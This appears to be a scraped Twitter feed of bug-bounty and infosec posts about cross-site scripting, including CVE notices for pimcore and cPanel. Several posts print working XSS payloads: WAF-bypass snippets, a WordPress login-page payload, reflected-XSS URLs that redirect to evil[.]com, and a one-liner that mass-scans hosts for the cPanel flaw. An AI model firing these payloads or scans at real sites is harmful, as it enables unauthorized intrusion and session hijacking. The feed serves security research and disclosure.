@novasecioa year ago1) Learn the ropes: https://t.co/6XIC5SLsiO https://t.co/6L6Nx6zYp4 https://t.co/qKM288dujb https://t.co/CFjWZNjxre https://t.co/wNAVWhKDhA https://t.co/xUjwTRKTSA
![profile](https://pbs.twimg.com/profile_images/1418087718408523776/wY-1xb3-_normal.jpg)
Cybertix
@thecybertixa year ago𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS Subscribe to our YouTube channel: 𝙇𝙞𝙣𝙠: https://t.co/c6zTMaPxRT #bugbountytips #bughunting #YouTube #shorts #Reels #hacking #Types #artificalintelligence #BugBounty #bugbountytip #money #PassiveIncome #automation #informationsecurity #bug #hack https://t.co/syR7iY3KHG
![profile](https://pbs.twimg.com/profile_images/1646131549035790337/uyvgijol_normal.jpg)
LinuxSecurity Live Advisory Updates
@LS_Advisoriesa year agoFedora 38: dokuwiki 20239e5f85ad02 Update to hotfix release 20230404a (fixes an XSS vulnerability). Fedora Update Notification FEDORA20239e5f85ad02 20230524 01:16:03.410... @lnxsec #Fedora #Linux #infosec #opensource #linuxsecurity https://t.co/r5TNDYgOLL https://t.co/SUUnR55hox
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agoKudos to cyberninja8881 & SchoobyDrew for their teamwork to find XSS vuln & get a CVE! 💪 🤓 Check out their blog post to learn how they bypassed a WAF. 🔗 https://t.co/dHjvyuRVO9 #cybersecurity #infosec #WAF #XSS Aaron0n waf_bypass
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@cobra0x011 This thread is saved to your Notion database. Tags: [Bugbountytips, Javascript, Xss]
![profile](https://pbs.twimg.com/profile_images/1623561607883247616/qlex0jTq_normal.jpg)
Cobra0x011 | DFIR
@cobra0x011a year ago@micro0x00 @SaveToNotion #thread #bugbountytips #javascript #xss
![profile](https://pbs.twimg.com/profile_images/860562378441740288/MgPA8UqM_normal.jpg)
Clint Gibler
@clintgiblera year ago🔖 A smorgasboard of a bug chain Chaining multiple vulnerabilities to achieve a 1-click CSRF attack: * An Insecure message event listener * A JSONP endpoint * A WAF Bypass * A DOM-based XSS * A permissive CORS configuration #bugbountytips By @jub0bs https://t.co/6cgZHPgdpZ
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0a year agoCracked XSS — Intigriti Challenge 0223 by Dr. Leek #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/0bk62YBVlU
![profile](https://pbs.twimg.com/profile_images/1583099162857447426/gW1QsOar_normal.jpg)
SOC Prime
@SOC_Primea year ago#Sigma rule to detect CVE-2023-29489 exploitation attempts, a reflected #XSS #vulnerability in #cPanel exposing millions of websites worldwide to the risk of compromise. https://t.co/nSA50xqrLm #CVE #DFIR #infosec #threathunting #BlueTeam #threatdetection #infosec #exploit #SOC https://t.co/QZLY14Wy7b
![profile](https://pbs.twimg.com/profile_images/1605993395788333071/Fgalr7xl_normal.jpg)
M7arm4n
@M7arm4na year agoAfter a hard time to bypassing Akamai to pop up an XSS, Finally done. thanks to @brutelogic & @PortSwigger <a href="https://www.domain.tld/m7arm4n" contenteditable onbeforeinput="[origin].map(top['ale'+'rt'])" >here</a> #WAF #Bypass #bugbountytips https://t.co/ljF1YWDBjF
![profile](https://pbs.twimg.com/profile_images/1646313566843092993/_uzui5ZN_normal.jpg)
Ashraf Abdelrazik
@ashabdelrazika year agoAccount Takeover Everywhere 🤨 Happy Hacking Month. #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking https://t.co/aLMQjYCmQ2
![profile](https://pbs.twimg.com/profile_images/1646313566843092993/_uzui5ZN_normal.jpg)
Ashraf Abdelrazik
@ashabdelrazika year agoXSS POC Videos https://t.co/ZffA3dQQFR #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking https://t.co/ZBhhuiCBus
![profile](https://pbs.twimg.com/profile_images/1653323500449419267/WYVbhtSu_normal.jpg)
Eve🧚♀️
@ex16x41a year agoWhats the (any) xss payload that got you a bc pr h1 submissions?? How did you weaponize it for poc? Was there specific web software or waf you bypassed? Im curious :^) #bugbountytips #curious #xss #hacking #bugcrowd #hackerone https://t.co/2RMTa46Qdw
![profile](https://pbs.twimg.com/profile_images/1481231355249930531/j4fUPznC_normal.jpg)
Patrik Fehrenbach
@ITSecurityguarda year ago@bugbounty_memes Yes, this is an accurate tweet about an XSS in a Plugin Wordpress plugin :D
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoXSS with style attribute background-image - Visit https://t.co/MFuC2fUBwU for the solution. #xss #infosec #softwareengineer #softwareengineering #engineer
![profile](https://pbs.twimg.com/profile_images/1586304872395202561/j1V90xCg_normal.jpg)
insane_Coder
@AnounimMa year agoi found the bypass for all *.stripe.com csp protection i'll use it with xss but still can't find xss #BugBounty
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ XSS vulnerability without a content security bypass in a `CUSTOM` App through Button tag 👨💻 @saajanbhujel ➟ Stripe 🟧 Medium 💰 $2,000 https://t.co/OFsGtTokky #bugbounty #bugbountytips #cybersecurity https://t.co/AbLfioOvEC
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Possible XSS vulnerability without a content security bypass 👨💻 @saajanbhujel ➟ Stripe 🟧 Medium 💰 $2,000 https://t.co/o1BF60plul #bugbounty #bugbountytips #cybersecurity https://t.co/2qJAiUABXW
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoYou can bypass Akamai WAF's XXE filters by HTML encoding the SYSTEM entity within a payload like this: <!DOCTYPE foo [<!ENTITY % a "&#x3c;&#x21; ... omitted ... #infosec #bugbountytip #cybersecuritytips #xss
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoBlind XSS at scale 🔥🔥🔥 #infosec #bugbountytip #cybersecuritytips https://t.co/7lZpPe0VNV
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoThis extension will help you to detect GET/POST based XSS vulnerability in any website easily - https://t.co/PIZCaKqXMl #infosec #bugbountytip #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1400908768205066250/G3Ys4s5i_normal.jpg)
David Parkinson Frost
@ParkinsonFrosta year agoService outage in @MSFT365Status, @Cisco discloses a zero-day used in XSS attacks, Mirai botnet exploiting CVE-2023-1389, and much more for this week's infosec news! (Anybody else here have papyrophobia? 🥹🗒️🩸) Thanks @rskvp93 @_q5ca @hoangnx99 for the research efforts! https://t.co/qzJzsZzxWm
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoCisco XSS zero-day flaw and PaperCut vulnerabilities #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1605993395788333071/Fgalr7xl_normal.jpg)
M7arm4n
@M7arm4na year agoFinally, After some while I reported my first blind XSS that was cooler than I think. Always spray blind XSS payload in every input and use Burp match and replace for headers. #BugBounty #bugbountytips #bugbountytip https://t.co/hzr2WmEtUT
![profile](https://pbs.twimg.com/profile_images/1635776504155054086/neTlqQh5_normal.jpg)
kro
@1337Kroa year ago#wordpress #bugbountytips Login page xss payload:- /wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(1337)%0c https://t.co/9yMdruqXfL
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@thek41234 Saved this Tweet to your Notion database. Tags: [Xss, Bugbounty, Tip, Automate]
![profile](https://pbs.twimg.com/profile_images/1321492899931062274/gN82sXoD_normal.jpg)
Thek41234
@thek41234a year ago@bughunty @SaveToNotion #tweet #bugbounty #xss #tip #automate
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2361): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/cMGybvolO6 Disclosed by https://t.co/r9ocxdn15q, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1625500493245214720/WS0i1Tdu_normal.jpg)
R3VEAL
@R3_VEALa year agoHall of fame in @auspost for the second time #BugBounty 😌❤️ #bugbountytip : Carefully observe every parameter and test for xss payloads. Make sure to customise your payload according to the site. 👨🏻💻 https://t.co/wAzmRhrfEs
![profile](https://pbs.twimg.com/profile_images/1418087718408523776/wY-1xb3-_normal.jpg)
Cybertix
@thecybertixa year ago𝘽𝙪𝙜 𝙏𝙮𝙥𝙚 : Reflected XSS 𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏 𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠: https://t.co/xXKr0Ma4jZ #bugbountytips #YouTube #Course #youtubechannel #SubscribeNow #PenetrationTesting #BugBounty #OWASP #securitybreach #bugs
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_falla year agoXSS Exploitation Tool: the exploitation of Cross-Site Scripting vulnerabilities https://t.co/VjUSrw4QX0 #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/537666031192272896/SLVtYItD_normal.png)
XSS Payloads
@XssPayloadsa year agoFinding XSS in a million websites, good finding by @infosec_au https://t.co/uVQR9hgRn2
![profile](https://pbs.twimg.com/profile_images/1579447960336736258/onpvDoib_normal.jpg)
Bug Hunty
@bughuntya year agoEasy Automation XSS Tip cat subdomains.txt | waybackurls >> wayback.txt cat subdomains.txt | hakrawler -depth 3 -plain >> spider.txt cat spider.txt wayback.txt | kxss #bugbounty #bugbountytips #cybersecurity #pentesting #hacking
![profile](https://pbs.twimg.com/profile_images/1391035223442341894/im3A3o_l_normal.jpg)
Kenan Genc
@kenanngnca year ago#bugbountytips #bugbountytip #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1612128553457561600/A2FAEqfw_normal.jpg)
Deepak 🇮🇳 -- bug_vs_me
@bug_vs_mea year ago#bugbountytip #BugBounty #0day #xss
![profile](https://pbs.twimg.com/profile_images/1587567677496778752/LyFUN27h_normal.jpg)
Keroles Magdy
@Keroles__Magdya year ago💖💖 الحمد لله Thanks God 💖💖 It found a Critical Bug that leaked names, addresses, and employee data 😜😜😎😎💖💖 #bugbounty #bughunting #bugcrowd #security #vulnerabilities #xss https://t.co/R51SgP4mri
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year ago🔥Bug:- Stored XSS tip :- always check all the fields and insert your payload #hacking #alwayslearning #hackers #bugbounty #bugbountytips #staysecure #happy credit:- Raviraj Jagtap https://t.co/txj9bdeclu
![profile](https://pbs.twimg.com/profile_images/1632438794031968256/zlVup5hD_normal.jpg)
VulnVision
@VulnVisiona year agowe are happy to share a 0day we have found on wordpress login page allow un-auth cross site scripting (xss) #bugbountytip #BugBounty #ItTakesACrowd https://t.co/AznA0pG3IB
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoXSS in custom, user-supplied CSS - Visit https://t.co/WO0nrikfT0 for the solution. #web_application #xss #css #infosec #coder
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2343): Cross-site Scripting (XSS) - DOM in pimcore/pimcore. https://t.co/JI3YeQ24dN Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2342): Cross-site Scripting (XSS) - Reflected in pimcore/pimcore. https://t.co/QUjGit6PON Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2341): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/3AQiMPbwyG Disclosed by https://t.co/UfN0Roo7qs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2340): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/QY2fuNfvD1 Disclosed by https://t.co/6dCOfMLYmV, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2339): Cross-site Scripting (XSS) - Reflected in pimcore/pimcore. https://t.co/0K5Jc80IdG Disclosed by https://t.co/6dCOfMLYmV, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2328): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/DH2V54zyEz Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2327): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/bclvtmEHor Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2323): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/JWjy6Mq1YK Disclosed by @sampritdas8, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-2322): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/oxKGO12RpK Disclosed by https://t.co/hUcH5mI7Mx, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1206541065815244805/hsk5DK2r_normal.jpg)
Vasileiadis A. (Cyberkid)
@Anastasis_Kinga year agoFinding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/7c1UDJTAFX #Pentesting #CVE #CyberSecurity #Infosec https://t.co/owxslV8pke
![profile](https://pbs.twimg.com/profile_images/1649034614042681345/i8oFRGCE_normal.jpg)
HackersNews.co.uk
@HackersNews247a year agoFind Us @HackersNews247 For The Latest News Or Visit Our Website Hackers News! #Hacking #Hacked #HackersNews #hacker #Hackingtime #Anonymous #hacktheplanet #news #newsUpdate #NewsUpdates https://t.co/OVJYObouiO
![profile](https://pbs.twimg.com/profile_images/1649034614042681345/i8oFRGCE_normal.jpg)
HackersNews.co.uk
@HackersNews247a year agoLet Remote Attackers Launch XSS. Hackers News https://t.co/64NSNiO8Vs #Hacking #Hacked #hack #Anonymous #NewsUpdate #HackersNews
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoOur favourite community contributions to the XSS cheat sheet #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
ahmedzezo
@ahmedze52774770a year agoGood XSS day 🤤😍 #bugbountytips #hackerone #BugBounty https://t.co/kUCLyO3z5h
![profile](https://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png)
Pierluigi Paganini - Security Affairs
@securityaffairsa year ago#Cisco discloses a bug in the Prime Collaboration Deployment solution https://t.co/R4lheXfwFR #securityaffairs #hacking
![profile](https://pbs.twimg.com/profile_images/1653323500449419267/WYVbhtSu_normal.jpg)
Eve🧚♀️
@ex16x41a year agoMy first bugbounty submission after a few years of not participating, nice start of the night )) 🐞🔎 Reflected XSS to Open Redirect: http://sub.sub.domain[.]com/publicsearch?source=%3Cscript%3Ealert(document.domain)%3C/script%3E for redir: document.location=“https://evil[.]com https://t.co/6zxHM4ZlBA
![profile](https://pbs.twimg.com/profile_images/1473710712669315075/HXTm1Avu_normal.jpg)
Codelivly
@Codelivlya year agoCisco Zero-Day Flaw: Let Remote Attackers Launch XSS Attacks Read Here : https://t.co/UE6A5hS84A #cisco #infosec #cybersec https://t.co/5TI61kvjGI
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoHow I was Able To Find Reflected XSS ? by: ozomarzu https://t.co/GlaL5cBQD1 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoEnsure input escaping in JSP - Visit https://t.co/cEXXft7io3 for the solution. #xss #java #infosec #engineering #code
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs it possible to grab all the cookies of different websites by only one XSS attack? - Visit https://t.co/XZyfUrPNgr for the answer. #xss #cookies #infosec #code #softwareengineering
![profile](https://pbs.twimg.com/profile_images/1196472306949918721/Zbk8ZOaj_normal.jpg)
ႢႭႹႠ ႭႵႰႠႻႤ გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradzea year ago@BurpBounty @infosec_au I agree with @BurpBounty . If your crawler found entry point with vulnerable cpanel after running scan it will find this xss 100%.
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
Nehemiah Edet
@clexingtonya year agoFinding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/qw8io00u0M #Pentesting #CVE #CyberSecurity #Infosec https://t.co/1OSfYN5PK5
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoAnatomy of an XSS Attack #infosec #cybersecurity #cyberdefense #hacking #informationsecurity #hacking #bugbounty #bugbountytips https://t.co/PeUXFsTH0D
![profile](https://pbs.twimg.com/profile_images/1651827535876079616/_-I8Dv0w_normal.jpg)
def1ant
@0xdef1anta year agoNuclei's headless capability is very powerful :) @pdiscoveryio #BugBounty #hackerone #bugcrowd #xss https://t.co/5Vfh9QNiw8
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBountya year agoHi everyone!! We have not released any special profiles to detect the CVE-2023-29489, because our scanner can potentially detect the XSS in the affected endpoint found by @infosec_au in their research https://t.co/evZyEOq7OU
![profile](https://pbs.twimg.com/profile_images/1616753532950175745/_en9P83L_normal.jpg)
Kullai🇮🇳
@Kullai12a year agoP3-Reflected XSS to Open Redirection in @Bugcrowd . Payload : http://sub[.]domain[.]com/scripts/wa-AWD.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E For Open Redirection document[.]location=“https://evil[.]com” #bugbounty #bugcrowd #bounty https://t.co/oGzbdLYVVP
![profile](https://pbs.twimg.com/profile_images/1626268981274505218/1kaj8Ypc_normal.jpg)
Cyber Wiki
@theCyberWikia year agoCreate Temporary Emails and Phone Numbers - https://t.co/anXUg6D26T #CyberWiki #theCyberWiki #HackHunt #Hack #Hacker #Hacking #EthicalHacking #Network #EthicalHacker #Cybersecure #Cybersecurity #Vulnerable #Software #Pentesting #XSS #VAPT #Audit #Forensics #Coding #BugHunting https://t.co/xh2gR5cPUT
![profile](https://pbs.twimg.com/profile_images/1634754471040548866/q8luDRF6_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoFinding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/52rhy2ncAG #infosecurity #CyberSec #bug #coding #BugBounty #infosec #bugbountytip #bugbountytips #pwn #ctf #CyberSecurityAwareness #cybersecuritytips #Hacking #XSS #redteam #Pentesting #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1646178438003458048/ONYGtDX3_normal.jpg)
Infosec Alevski 💻🕵️♂️
@Alevskeya year agoCisco discloses a bug in the Prime Collaboration Deployment solution: https://t.co/cMeSav8tbi by Security Affairs #infosec #cybersecurity #technology #news
![profile](https://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png)
Pierluigi Paganini - Security Affairs
@securityaffairsa year ago#Cisco discloses a bug in the Prime Collaboration Deployment solution https://t.co/R4lheXfwFR #securityaffairs #hacking
![profile](https://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png)
Pierluigi Paganini - Security Affairs
@securityaffairsa year ago#Cisco discloses a bug in the Prime Collaboration Deployment solution https://t.co/R4lheXfwFR #securityaffairs #hacking #malware
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoCross Site Scripting (XSS) #infosec #infosecurity #cybersec #cybersecurity #ethicalhacking #penetrationtesting #pentesting #kalilinux #hacking #hacker #bugbounty #bugbountytips https://t.co/lnQ9Lmmfdw
![profile](https://pbs.twimg.com/profile_images/1371589267252776962/8_4YSfPn_normal.jpg)
Alonso Caballero
@Alonso_ReYDeSa year agoDisponible el video del Webinar Gratuito: "Cross-Site Scripting (XSS)". #cybersecurity #hacking #readteam #bugbounty #forensics #osint 🤖 https://t.co/QU6ghIwHeR https://t.co/y5eiyp3agf
![profile](https://pbs.twimg.com/profile_images/1152241080869511171/Nxzz-tZx_normal.png)
Grid32 Cybersecurity
@Grid32InfoSeca year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/EuCwvtASuG #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoFinding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/pFdUjmv9B4 #Pentesting #CVE #CyberSecurity #Infosec https://t.co/BYkcMvNS4g
![profile](https://pbs.twimg.com/profile_images/1426303620266565633/Xxj8V-a9_normal.jpg)
HolyBugx
@HolyBugxa year ago@BurpBounty "... because our scanner can potentially detect the XSS in the affected endpoint found by @infosec_au" - thats how you should've phrased it.
![profile](https://pbs.twimg.com/profile_images/1598179360900780034/Gywep4k9_normal.jpg)
Het Mehta
@hetmehtaaa year ago💠 𝗕𝗹𝘂𝗲 𝗧𝗲𝗮𝗺𝗶𝗻𝗴 Bootcamp Series 🔗 Part 1: https://t.co/QUDxkEbrTk 🔗 Part 2: https://t.co/RX4l8R8xb8 🔗 Part 3: https://t.co/pwOthztAlU @hacklido #infosec #blueteam #cyber #tech #blogs
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBountya year ago@infosec_au Hey @infosec_au , my apologies, Burp Bounty Pro XSS profiles detect your issue only if scan the correct path /cpanelwebcall/. Of course, I didn't know about this issue until you posted it. I want to congratulate you on your work, https://t.co/evZyEOq7OU
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBountya year ago@malcolmx0x @infosec_au I agree with you, without @infosec_au research and their post none of us would know about the XSS in Cpanel.
![profile](https://pbs.twimg.com/profile_images/1637836898453340160/BBX77k4x_normal.jpg)
SECBROS
@YouTube_Secbrosa year agoAnatomy of an XSS Attack #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips https://t.co/DBiku2eZIl
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBountya year ago@AkashHamal0x01 @rez0__ @infosec_au Exactly, I didn't know that this specific software had an xss, but because of how the scanner works, if it scans that path, it would identify the xss. It's not my intention to detract from the author or say that I knew about this vulnerability before he did.
![profile](https://pbs.twimg.com/profile_images/1183460322843082752/EbKlKldd_normal.jpg)
Towards Cybersecurity
@TowardsCyberseca year agoCisco disclosed a zero-day vulnerability in the company's Prime Collaboration Deployment (PCD) software that can be exploited for cross-site scripting attacks. #cybersecurity #security #infosec #Cisco #Zeroday #bug #infosecurity #Vulnerability #cyberattack #xss #hacking #hack https://t.co/mpBIRDcFRu
![profile](https://pbs.twimg.com/profile_images/1443293358718287872/bLYwaPeV_normal.jpg)
root@AkashHamal0x01:~/ # 🇵🇭
@AkashHamal0x01a year ago@rez0__ @BurpBounty @infosec_au he meant that his scanners also detected xss on /web../ path not that he already knew the issue or identified it
![profile](https://pbs.twimg.com/profile_images/1404125874350264322/6G0a9c7a_normal.jpg)
payloadartist
@payloadartista year ago🪲 Finding XSS In A Million Websites (cPanel CVE-2023-29489) https://t.co/ezIOtmfDUY Awesome research by @infosec_au and @assetnote team #bugbountytips #bugbounty #infosec #cybersecurity https://t.co/Qng7R0Qzj4
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBountya year agoMaybe there was a misunderstanding with my previous tweet, I didn't know there was an XSS bug in cpanel, I read it in the @infosec_au article. Once I read I saw that with the XSS payloads this issue was detected if the path /cpanelwebcall/ was scanned. All credit to @infosec_au
![profile](https://pbs.twimg.com/profile_images/1640291793517309952/Zmgqd9M__normal.jpg)
Matin Nooriyan
@MatinNouryana year agonuclei template for cpanel xss url: http/cves/2023/CVE-2023-29489.yaml #bugbountytips #cve_2023 #cpanel #xss #hackerone #bugbrowd https://t.co/tqYJtSZF7h
![profile](https://pbs.twimg.com/profile_images/1553373164763242496/woyvOnxt_normal.jpg)
dadomar
@v0000000000la year ago@infosec_au i hope you understand the purpose of that tool, its like running Burp Intruder on /cpanelwebcall/$[payload here]$ with a list of xss payloads , it can be whatever endpoint, not `cpanelwebcall` and these types of automations are in nuclei a lot... :|
![profile](https://pbs.twimg.com/profile_images/1534604643686309889/2Q5xoqaw_normal.png)
Gbounty
@GBountySecuritya year ago🔥🚀 "Heads up, everyone! ! We have not released any special profiles to detect the CVE-2023-29489 (#XSS in #cPanel) vulnerability, because we already detected it with our current XSS profiles 💯.🔒🌐 #Cybersecurity #InfoSec" 🚀🔥 https://t.co/D8Q5hj094Z https://t.co/hYNwESPnet https://t.co/Qv8VzSL9vX
![profile](https://pbs.twimg.com/profile_images/1645746233410027520/GIPqoFtu_normal.jpg)
nazu:)🩸🌳💚
@mrnazu_a year ago🔥 #cPanel #CVE-2023-29489 🔥 Over 1 million websites were exposed to a reflected #XSS vulnerability recently discovered in #cpanel, a widely used web hosting software! #Web #BugBounty #CyberSecurity https://t.co/JrdzBiponD
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_onlinea year agoReflected XSS #Hacking https://t.co/CbaWAIhgOL
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_onlinea year agoTesting site for XSS.. Then sleep. Night all. #GoodNightTwitterWorld #Hacking
![profile](https://pbs.twimg.com/profile_images/1418087718408523776/wY-1xb3-_normal.jpg)
Cybertix
@thecybertixa year agocPanel CVE-2023-29489 XSS One-Liner subfinder -d https://t.co/Yhf9Pkx6cS -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400 #bugbountytips #cybersecuritytips #bug #hacks https://t.co/95OiBf33rM
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_onlinea year agoToday's accomplishments: Completed Path Traversal for "fun" Completed a path on TryHackMe Programmed a clickjacking POC Learned to use Burp properly, practiced manipulating headers. Finished learning OWASP ZAP for manual testing. Coded my XSS Session Hijack exploit #Hacking
![profile](https://pbs.twimg.com/profile_images/1651326735458156544/LLEK8X7v_normal.jpg)
dexsec
